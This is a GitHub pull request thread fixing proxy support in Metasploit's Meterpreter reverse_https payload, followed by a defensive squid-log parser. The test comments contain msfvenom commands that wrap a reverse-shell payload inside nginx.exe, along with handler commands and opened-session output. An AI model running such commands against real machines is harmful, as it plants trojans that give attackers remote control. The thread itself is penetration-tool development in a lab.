rapid7 / meterpreter

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD

Fix up WinHTTP proxy implementation #143

Closed. OJ closed this PR 9 years ago.

OJ commented 9 years ago

These changes correct a few logic issues that were in place in the proxy handling for the WinHTTP implementation:

  1. Proxy condition check was inverted.
  2. Proxy username and password must be set on the request, and not the session handle.

Verification

• [ ] reverse_http(s) payloads now correctly handle the proxy, proxy username and proxy password settings.

Testing of this can be done in a similar way to HD's PR here: https://github.com/rapid7/metasploit-framework/pull/4934

Note, the MSF-side changes that are listed in the following PR are required as well: https://github.com/rapid7/metasploit-framework/pull/5045

metasploit-public-bot commented 9 years ago

Test PASSED. Refer to this link for build results (access rights to CI server needed): https://ci.metasploit.com//job/GPR-MeterpreterWin/167/

bcook-r7 commented 9 years ago

Works well with tinyproxy; let me try squid too. Conf file:

User nobody
Group nobody
Port 8888
Timeout 600
StatFile "/tmp/tinyproxy-stats.html"
LogFile "/tmp/tinyproxy.log"
LogLevel Info
PidFile "/tmp/tinyproxy.pid"
Allow 127.0.0.1
Allow 192.168.56.102
ViaProxyName "tinyproxy"
FilterURLs Off
FilterDefaultDeny No

payload

./msfvenom -p windows/meterpreter_reverse_https LHOST=192.168.56.1 EXTENSIONS=stdapi PayloadProxyHost=192.168.56.1 PayloadProxyPort=8888 -x nginx.exe -f exe -o proxy.exe

test

./msfconsole -qx "use exploit/multi/handler; set payload windows/meterpreter_reverse_https; set lhost 192.168.56.1; run"
payload => windows/meterpreter_reverse_https
lhost => 192.168.56.1
[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
[*] Starting the payload handler...
[*] 192.168.56.1:50160 Request received for /b7pY_Y62FXRA2zvNkXHZ6/...
[*] Incoming orphaned or stageless session b7pY_Y62FXRA2zvNkXHZ6, attaching...
[*] Meterpreter session 1 opened (192.168.56.1:8443 -> 192.168.56.1:50160) at 2015-04-01 22:03:13 -0500

meterpreter > sysinfo
Computer        : WINDOWS-8-VM
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit

bcook-r7 commented 9 years ago

The squid liked it too (btw, mac homebrew comes with the most sensible default squid.conf):

payload

./msfvenom -p windows/meterpreter_reverse_https LHOST=192.168.56.1 EXTENSIONS=stdapi PayloadProxyHost=192.168.56.1 PayloadProxyPort=3128 PayloadProxyUser=myproxyuser PayloadProxyPass=MyProxyPass -x nginx.exe -f exe -o proxy.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Saved as: proxy.exe

a squid says:

1427944867.661    374 192.168.56.102 TCP_MISS/200 1690 CONNECT 192.168.56.1:8443 - HIER_DIRECT/192.168.56.1 -

session

./msfconsole -qx "use exploit/multi/handler; set payload windows/meterpreter_reverse_https; set lhost 192.168.56.1; run"
payload => windows/meterpreter_reverse_https
lhost => 192.168.56.1
[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
[*] Starting the payload handler...
[*] 192.168.56.1:50488 Request received for /htP6_bkNk7fFmmtxrADHw/...
[*] Incoming orphaned or stageless session htP6_bkNk7fFmmtxrADHw, attaching...
[*] Meterpreter session 1 opened (192.168.56.1:8443 -> 192.168.56.1:50488) at 2015-04-01 22:21:07 -0500
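Added example (not code from this PR or from Metasploit): a defender-side reading of the squid line Brent quoted. It parses squid's native access.log layout and aggregates CONNECT tunnels that go to a bare IP or to a port other than 443, which is exactly the shape of the test traffic above; the sample log is constructed, with two lines mirroring the quoted one and two ordinary browsing lines for contrast.

```python
import re
from ipaddress import ip_address

# Squid native access.log line layout, as in the CONNECT line quoted in the thread:
#   timestamp elapsed client action/status bytes method url ident hierarchy/peer type
SQUID_LINE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+(?P<action>\S+)/(?P<status>\d{3})"
    r"\s+(?P<bytes>\d+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<ident>\S+)\s+"
    r"(?P<hier>\S+)/(?P<peer>\S+)\s+(?P<ctype>\S+)$"
)

# Constructed sample: lines 1 and 4 mirror the thread's squid line (CONNECT to a bare IP on
# 8443); lines 2 and 3 are ordinary browsing traffic added for contrast.
SAMPLE_LOG = """\
1427944867.661    374 192.168.56.102 TCP_MISS/200 1690 CONNECT 192.168.56.1:8443 - HIER_DIRECT/192.168.56.1 -
1427944870.101     52 192.168.56.102 TCP_MISS/200 9820 CONNECT www.example.com:443 - HIER_DIRECT/93.184.216.34 -
1427944871.220     40 192.168.56.103 TCP_MISS/200 512 GET http://www.example.com/ - HIER_DIRECT/93.184.216.34 text/html
1427944875.990    300 192.168.56.102 TCP_MISS/200 1702 CONNECT 192.168.56.1:8443 - HIER_DIRECT/192.168.56.1 -
"""

def parse_squid_line(line):
    # Fields of one native-format line as a dict, or None if the line does not parse.
    m = SQUID_LINE.match(line.strip())
    return m.groupdict() if m else None

def is_literal_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

def find_suspicious_connects(log_text, allowed_ports=frozenset({443})):
    """Return {(client, host, port): {"count", "reasons"}} for CONNECT tunnels to a bare IP
    or to a port outside allowed_ports; a repeated tunnel (beaconing shape) shows as a count."""
    findings = {}
    for line in log_text.splitlines():
        rec = parse_squid_line(line)
        if rec is None or rec["method"] != "CONNECT":
            continue
        host, _, port = rec["url"].rpartition(":")
        if not port.isdigit():
            continue  # a CONNECT target always carries host:port; skip anything else
        port = int(port)
        reasons = ["literal-ip-destination"] if is_literal_ip(host) else []
        if port not in allowed_ports:
            reasons.append(f"non-standard-port:{port}")
        if reasons:
            entry = findings.setdefault((rec["client"], host, port), {"count": 0, "reasons": reasons})
            entry["count"] += 1
    return findings
```

Run against a real access.log, the two-hit entry for 192.168.56.102 -> 192.168.56.1:8443 is the kind of record worth correlating with the proxy authentication log when PayloadProxyUser is in play.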

OJ commented 9 years ago

Thanks Brent!